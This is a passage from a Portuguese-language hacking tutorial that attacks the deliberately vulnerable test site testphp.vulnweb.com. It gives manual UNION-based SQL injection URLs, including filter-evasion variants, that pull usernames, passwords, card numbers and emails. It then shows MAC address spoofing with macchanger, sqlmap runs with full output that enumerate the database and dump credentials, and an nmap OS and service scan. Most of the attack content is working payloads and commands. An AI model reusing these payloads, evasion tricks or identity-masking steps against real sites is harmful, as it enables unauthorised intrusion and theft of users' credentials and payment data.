     from*/ information_schema.tables where table_schema=database()


http://testphp.vulnweb.com/artists.php?artist=100
     union select 1,2,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)
     where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)



Vuln column: 3

http://testphp.vulnweb.com/artists.php?artist=-1
     /*!50000union*/ /*!50000select*/ 1,2,database()

http://testphp.vulnweb.com/artists.php?artist=-1
     /*!50000union*/ /*!50000select*/ 1,2,user()

http://testphp.vulnweb.com/artists.php?artist=-1
     union select 1,pass,cc FROM users WHERE uname='test'


Vuln column: 7

http://testphp.vulnweb.com/listproducts.php?cat=3
     UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11-- -

http://testphp.vulnweb.com/listproducts.php?cat=3
     union all select1,2,3,4,5,6,'<< Coluna 7 esta vulneravel >>',8,9,10,11-- -

http://testphp.vulnweb.com/listproducts.php?cat=3
      and 1 = 0 union select 1,2,3,4,5,6,version(),8,9,10,11-- -


Vuln columns:7 and 11

http://testphp.vulnweb.com/listproducts.php?cat=-1
    union select 1,2,3,4,5,6,version(),8,9,10,user()

http://testphp.vulnweb.com/listproducts.php?cat=3
     /*!50000%55nIoN*/ /*!50000%53eLeCt*/ 1,2,3,4,5,6,7,8,9,10,11-- -

http://testphp.vulnweb.com/listproducts.php?cat=3
     /**//*!12345UNION SELECT*//**/ 1,2,3,4,5,6,7,8,9,10,11-- -

http://testphp.vulnweb.com/listproducts.php?cat=3
     /*--*/union/*--*/select/*--*/ 1,2,3,4,5,6,7,8,9,10,11-- -

http://testphp.vulnweb.com/listproducts.php?cat=3
     /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4,5,6,7,8,9,10,11-- -

http://testphp.vulnweb.com/listproducts.php?cat=3
     /**/union/*!50000select*//**/ 1,2,3,4,5,6,7,8,9,10,11-- -

http://testphp.vulnweb.com/listproducts.php?cat=-1
     union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 from 
    information_schema.columns where table_schema=database() and table_name='users'--+

http://testphp.vulnweb.com/listproducts.php?cat=-1
     union all select 1,group_concat('User : ',uname,' Password: ',pass,
     ' Phone: ',cc,' Email: ',email),3,4,5,6,7,8,9,10,11 from users--+

http://testphp.vulnweb.com/listproducts.php?cat=-1
     union select 'vuln1','vuln2','vuln3','vuln4','vuln5','vuln6','vuln7','vuln8',
     'vuln9','vuln10','vuln11'


Vuln column: 1 3 7 9

http://testphp.vulnweb.com/product.php?pic=-1
      and 1 = 0 union select 1,'Vuln 2','Vuln 3',4,5,6,'Vuln 7',8,'Vuln 9',10,11--


http://testphp.vulnweb.com/product.php?pic=-1
      and 1 = 0 union select 1,version(),user(),4,5,6,'Vuln 7===',8,database(),10,11--


http://testphp.vulnweb.com/artists.php?artist=100
      union select 1,2,(select count(table_name) from information_schema.tables)


http://testphp.vulnweb.com/product.php?pic=-1
     and 1 = 0 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11
     FROM information_schema.columns WHERE table_name=CHAR(117, 115, 101, 114, 115)--


http://testphp.vulnweb.com/listproducts.php?cat=-1
      union select 1,2,3,4,5,6,concat(uname,0x3a,pass,0x3a,email,0x3a,name),8,9,10,11
      from users

08 - Kali Linux - Downloading and Installing

O kali Linux e um sistema operacional (OS) avançado com varias ferramentas para testes
de seguranças ( Teste de Penetração ), esses testes são feitos para descobrir falhas em
sistemas operacionais, redes, internet e vários outros... ele é totalmente baseado no
Debian, que é outro sistema operacional também derivado do linux.

Seu antecessor foi o BackTrack Linux. O Kali Linux foi o renascimento do Backtrack, o
novo Kali Linux veio com a proposta de ser a mais robusta, avançada e estável
distribuição para testes de invasão, disponibilizando mais de 300 ferramentas e um
kernel modificado, sendo também completamente customizável.


Vamos baixar o Kali para fazermos os exemplos de Injeção manual agora com a ferramenta
sqlmap do Kali.

https://www.kali.org/

https://www.kali.org/downloads/



Downloading Kali Linux image file ( iso )



Watch the step by step movie showing how to install Kali on your VirtualBox.

I have already shown the step by step installation of Linux Debian so it it exactly the
same way with Kali. :)



Username: root


Password: 123




Clique no icone no lado esquerdo para abrir o terminal. Se preferir acessar o terminal via putty ou terminal do mac então precisaremos iniciar o serviço do ssh. service ssh start ( enter ) Se usar o terminal do Kali não precisaremos usar a linha acima. ifconfig ( enter )
Atualizando o sistema. apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y ( enter ) Vamos inicar o servico do ssh para acessarmos via putty ou terminal mac. service ssh start ( enter )

09 - Kali - Sqlmap

Agora vamos reproduzir o exemplo da "Injeção Manual de SQL" usando a ferramenta sqlmap
do Kali Linux.


 SqlMap 

O SQLMAP é uma ferramenta de injeção SQL desenvolvida em Python, seu objetivo é
detectar e explorar vulnerabilidades de injeção SQL em aplicações ou sites web, uma
vez que se detecta uma ou mais injeções de SQL em um alvo, o usuário pode escolher
entre uma variedade de opções que o SQLMAP disponibiliza para explorar os dados
armazenados dentro do banco de dados deste sistema ou site, tais como, extrair a lista
de usuários, senhas, privilégios, tabelas e muito mais..


----------------------------------------------


Lei 12.737/2012 no Art. 154-A

Invadir dispositivo informático alheio, conectado ou não à rede de computadores,
mediante violação indevida de mecanismo de segurança e com o fim de obter, adulterar
ou destruir dados ou informações sem autorização expressa ou tácita do titular do
dispositivo ou instalar vulnerabilidades para obter vantagem ilícita:

Pena – detenção, de 3 (três) meses a 1 (um) ano, e multa.

Lei Nº 12.737, de 30 de novembro de 2012.


----------------------------------------------


No terminal no Kali digite os comandos abaixo para mudar o mac address.


 ifconfig eth0 down 


 macchanger -m 02:33:4A:B5:6C:D7   eth0 

Permanent MAC: e8:94:f6:1c:0e:8b (unknown)
Current   MAC: 02:33:4a:b5:6c:e7 (unknown)
New       MAC: 02:33:4a:b5:6c:d7 (unknown)

 ifconfig eth0 up 


Na prática...




----------------------------------------------


Vamos vamos usar o ferramenta do Kali Linux chamada de sqlmap para acharmos as
vulnerabilidades de injeção de sql.


sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1"

      _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601040a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local, state
and federal laws. Developers assume no liability and are not responsible for any misuse
or damage caused by this program

[*] starting at 21:25:44

[21:25:45] [INFO] testing connection to the target URL
[21:25:46] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[21:25:46] [INFO] testing if the target URL is stable
[21:25:47] [INFO] target URL is stable
[21:25:47] [INFO] testing if GET parameter 'artist' is dynamic
[21:25:47] [INFO] confirming that GET parameter 'artist' is dynamic
[21:25:48] [INFO] GET parameter 'artist' is dynamic
[21:25:48] [INFO] heuristic (basic) test shows that GET parameter 'artist' might be
injectable (possible DBMS: 'MySQL')
[21:25:48] [INFO] testing for SQL injection on GET parameter 'artist'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific
 for other DBMSes? [Y/n]   y 
for the remaining tests, do you want to include all tests for 'MySQL' extending
provided level (1) and risk (1) values? [Y/n]  y 
[21:25:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:26:02] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind -
WHERE or HAVING clause' injectable
[21:26:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause'
[21:26:02] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause'
[21:26:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:26:03] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:26:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (UPDATEXML)'
[21:26:04] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (UPDATEXML)'
[21:26:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (EXP)'
[21:26:04] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
[21:26:05] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[21:26:05] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause
(BIGINT UNSIGNED)'
[21:26:06] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause'
[21:26:06] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[21:26:07] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[21:26:09] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[21:26:09] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[21:26:09] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[21:26:09] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[21:26:10] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[21:26:10] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[21:26:11] [INFO] testing 'MySQL inline queries'
[21:26:11] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[21:26:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[21:26:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[21:26:12] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:26:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[21:26:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[21:26:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[21:26:24] [INFO] GET parameter 'artist' seems to be 'MySQL >= 5.0.12 AND time-based
blind (SELECT)' injectable
[21:26:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:26:24] [INFO] automatically extending ranges for UNION query injection technique
tests as there is at least one other (potential) technique found
[21:26:26] [INFO] ORDER BY technique seems to be usable. This should reduce the time
needed to find the right number of query columns.
Automatically extending the range for current UNION query injection technique test
[21:26:27] [INFO] target URL appears to have 3 columns in query
[21:26:33] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 20
columns' injectable
GET parameter 'artist' is vulnerable. Do you want to keep testing the others
(if any)? [y/N]  n 
sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5701=5701

    Type: AND/OR time-based blind
    Title:MySQL >= 5.0.12 AND time-based blind (SELECT) 
    Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f467445594851666976445952435075617
06e624d42526f597a73,0x7171786271)-- -
---
[21:26:43] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[21:26:43] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 21:26:43


----------------------------------------------


Vamos listar os bancos de dados.


 --dbs   = lista bancos de dados


sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs

         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601040a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program

[*] starting at 21:59:28

[21:59:28] [INFO] resuming back-end DBMS 'mysql'
[21:59:29] [INFO] testing connection to the target URL
[21:59:30] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5701=5701

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[21:59:30] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[21:59:30] [INFO] fetching database names
[21:59:30] [INFO] the SQL query used returns 2 entries
[21:59:30] [INFO] resumed: information_schema
[21:59:30] [INFO] resumed: acuart
available databases [2]:
[*] acuart
[*] information_schema

[21:59:30] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 21:59:30


----------------------------------------------


-D        = acuart  ( banco de dados )

--tables  = lista tabelas


----------------------------------------------


Listando todas as tabelas do banco de dados acuart.


sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables

         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601040a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program

[*] starting at 22:02:11

[22:02:11] [INFO] resuming back-end DBMS 'mysql'
[22:02:11] [INFO] testing connection to the target URL
[22:02:14] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5701=5701

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[22:02:15] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[22:02:15] [INFO] fetching tables for database: 'acuart'
[22:02:15] [INFO] the SQL query used returns 8 entries
[22:02:15] [INFO] resumed: artists
[22:02:15] [INFO] resumed: carts
[22:02:15] [INFO] resumed: categ
[22:02:15] [INFO] resumed: featured
[22:02:15] [INFO] resumed: guestbook
[22:02:15] [INFO] resumed: pictures
[22:02:15] [INFO] resumed: products
[22:02:15] [INFO] resumed: users

Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

[22:02:15] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 22:02:15

----------------------------------------------

Listando todas as tabelas e campos do banco de dados acuart.


--tables  = lista tabelas

--columns = lista colunas


----------------------------------------------


sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --columns
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601040a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program

[*] starting at 22:15:25

[22:15:25] [INFO] resuming back-end DBMS 'mysql'
[22:15:25] [INFO] testing connection to the target URL
[22:15:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5701=5701

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[22:15:27] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[22:15:27] [INFO] fetching tables for database: 'acuart'
[22:15:27] [INFO] the SQL query used returns 8 entries
[22:15:27] [INFO] resumed: artists
[22:15:27] [INFO] resumed: carts
[22:15:27] [INFO] resumed: categ
[22:15:27] [INFO] resumed: featured
[22:15:27] [INFO] resumed: guestbook
[22:15:27] [INFO] resumed: pictures
[22:15:27] [INFO] resumed: products
[22:15:27] [INFO] resumed: users

Database: acuart

[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

[22:15:27] [INFO] fetching columns for table 'artists' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 3 entries
[22:15:27] [INFO] resumed: "artist_id","int(5)"
[22:15:27] [INFO] resumed: "aname","varchar(50)"
[22:15:27] [INFO] resumed: "adesc","text"
[22:15:27] [INFO] fetching columns for table 'carts' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 3 entries
[22:15:27] [INFO] resumed: "cart_id","varchar(100)"
[22:15:27] [INFO] resumed: "price","int(11)"
[22:15:27] [INFO] resumed: "item","int(11)"
[22:15:27] [INFO] fetching columns for table 'categ' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 3 entries
[22:15:27] [INFO] resumed: "cat_id","int(5)"
[22:15:27] [INFO] resumed: "cname","varchar(50)"
[22:15:27] [INFO] resumed: "cdesc","tinytext"
[22:15:27] [INFO] fetching columns for table 'featured' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 2 entries
[22:15:27] [INFO] resumed: "pic_id","int(11)"
[22:15:27] [INFO] resumed: "feature_text","text"
[22:15:27] [INFO] fetching columns for table 'guestbook' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 3 entries
[22:15:27] [INFO] resumed: "sender","varchar(150)"
[22:15:27] [INFO] resumed: "mesaj","text"
[22:15:27] [INFO] resumed: "senttime","int(32)"
[22:15:27] [INFO] fetching columns for table 'pictures' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 8 entries
[22:15:27] [INFO] resumed: "pic_id","int(5)"
[22:15:27] [INFO] resumed: "pshort","mediumtext"
[22:15:27] [INFO] resumed: "plong","text"
[22:15:27] [INFO] resumed: "price","int(11)"
[22:15:27] [INFO] resumed: "cat_id","int(11)"
[22:15:27] [INFO] resumed: "a_id","int(11)"
[22:15:27] [INFO] resumed: "title","varchar(100)"
[22:15:27] [INFO] resumed: "img","varchar(50)"
[22:15:27] [INFO] fetching columns for table 'products' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 5 entries
[22:15:27] [INFO] resumed: "id","int(10) unsigned"
[22:15:27] [INFO] resumed: "name","text"
[22:15:27] [INFO] resumed: "rewritename","text"
[22:15:27] [INFO] resumed: "description","text"
[22:15:27] [INFO] resumed: "price","int(10) unsigned"
[22:15:27] [INFO] fetching columns for table 'users' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 8 entries
[22:15:27] [INFO] resumed: "uname","varchar(100)"
[22:15:27] [INFO] resumed: "pass","varchar(100)"
[22:15:27] [INFO] resumed: "cc","varchar(100)"
[22:15:27] [INFO] resumed: "address","mediumtext"
[22:15:27] [INFO] resumed: "email","varchar(100)"
[22:15:27] [INFO] resumed: "name","varchar(100)"
[22:15:27] [INFO] resumed: "phone","varchar(100)"
[22:15:27] [INFO] resumed: "cart","varchar(100)"

Database: acuart
Table: categ

[3 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| cat_id | int(5)      |
| cdesc  | tinytext    |
| cname  | varchar(50) |
+--------+-------------+

Database: acuart
Table: users

[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

Database: acuart
Table: carts

[3 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| cart_id | varchar(100) |
| item    | int(11)      |
| price   | int(11)      |
+---------+--------------+

Database: acuart
Table: pictures

[8 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| a_id   | int(11)      |
| cat_id | int(11)      |
| img    | varchar(50)  |
| pic_id | int(5)       |
| plong  | text         |
| price  | int(11)      |
| pshort | mediumtext   |
| title  | varchar(100) |
+--------+--------------+

Database: acuart
Table: featured

[2 columns]
+--------------+---------+
| Column       | Type    |
+--------------+---------+
| feature_text | text    |
| pic_id       | int(11) |
+--------------+---------+

Database: acuart
Table: products

[5 columns]
+-------------+------------------+
| Column      | Type             |
+-------------+------------------+
| description | text             |
| id          | int(10) unsigned |
| name        | text             |
| price       | int(10) unsigned |
| rewritename | text             |
+-------------+------------------+

Database: acuart
Table: artists

[3 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| adesc     | text        |
| aname     | varchar(50) |
| artist_id | int(5)      |
+-----------+-------------+

Database: acuart
Table: guestbook

[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| mesaj    | text         |
| sender   | varchar(150) |
| senttime | int(32)      |
+----------+--------------+

[22:15:27] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 22:15:27



----------------------------------------------


Listando o conteúdo dos dois campos, uname and pass ( username e password )  :)

-D acuart      = banco de dados

-T users       = tabela ( de usuarios )

-C uname,pass  = listara os 2 campos ( usuario e senha )

--dump         = mostra os dados



----------------------------------------------


Digite o comando abaixo em uma única linha.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1"
                                              -D acuart -T users -C uname,pass --dump
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601040a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program

[*] starting at 22:26:26

[22:26:26] [INFO] resuming back-end DBMS 'mysql'
[22:26:26] [INFO] testing connection to the target URL
[22:26:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5701=5701

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[22:26:27] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[22:26:27] [INFO] fetching entries of column(s) 'pass, uname' for table 'users'
in database 'acuart'
[22:26:27] [INFO] the SQL query used returns 1 entries
[22:26:27] [INFO] retrieved: "test","test"
[22:26:27] [INFO] analyzing table dump for possible password hashes

Database: acuart
Table: users

[1 entry]
+-------+------+
| uname | pass |
+-------+------+
| test  | test |
+-------+------+

[22:26:27] [INFO] table 'acuart.users' dumped to CSV file
                    '/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[22:26:27] [INFO] fetched data logged to text files under
                    '/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 22:26:27


----------------------------------------------


Veja acima o usuário e a senha purto texto super secreta... :)


Abaixo vamos testar o acesso no site...





Acessando os dados...




----------------------------------------------


sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-user
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601040a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program

[*] starting at 22:43:27

[22:43:27] [INFO] resuming back-end DBMS 'mysql'
[22:43:27] [INFO] testing connection to the target URL
[22:43:28] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5701=5701

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[22:43:28] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[22:43:28] [INFO] fetching current user
current user:    'acuart@localhost'
[22:43:28] [INFO] fetched data logged to text files under
  '/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 22:43:28



----------------------------------------------



sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --users
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601040a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program

[*] starting at 22:45:09

[22:45:10] [INFO] resuming back-end DBMS 'mysql'
[22:45:10] [INFO] testing connection to the target URL
[22:45:10] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5701=5701

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[22:45:11] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[22:45:11] [INFO] fetching database users
[22:45:11] [INFO] the SQL query used returns 1 entries
[22:45:11] [INFO] retrieved: 'acuart'@'localhost'
database management system users [1]:
[*] 'acuart'@'localhost'

[22:45:11] [INFO] fetched data logged to text files under
                  '/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 22:45:11


----------------------------------------------


Verificando portas abertas.


nmap -sS -P0 -sV -O testphp.vulnweb.com

Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-06-12 22:57 EDT
Nmap scan report for testphp.vulnweb.com (176.28.50.165)
Host is up (0.25s latency).
rDNS record for 176.28.50.165: rs202995.rs.hosteurope.de
Not shown: 985 closed ports

PORT     STATE    SERVICE      VERSION

21/tcp   open     ftp          ProFTPD 1.3.3e
22/tcp   open     ssh          OpenSSH 5.3p1 Debian 3ubuntu7.1 (Ubuntu Linux; protocol 2.0)
25/tcp   open     smtp         Postfix smtpd
53/tcp   open     domain       ISC BIND none
80/tcp   open     http         nginx 1.4.1
106/tcp  open     pop3pw       poppassd
110/tcp  open     pop3         Courier pop3d
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
143/tcp  open     imap         Plesk Courier imapd
445/tcp  filtered microsoft-ds
465/tcp  open     ssl/smtp     Postfix smtpd
993/tcp  open     ssl/imap     Plesk Courier imapd
995/tcp  open     ssl/pop3     Courier pop3d
8443/tcp open     http         lighttpd

Aggressive OS guesses: Linux 2.6.32 (89%), QNAP NAS Firmware 3.8.3 (Linux 3.X) (87%),
IPFire firewall 2.11 (Linux 2.6.32) (87%), D-Link DSL-2890AL ADSL router (87%),
IPCop 1.9.19 or IPFire firewall 2.9 (Linux 2.6.32) (87%), OpenWrt Kamikaze 8.09
(Linux 2.6.25.20) (87%), Linux 2.6.36 (87%), Linux 3.2.1 (86%), Linux 2.6.35 (86%),
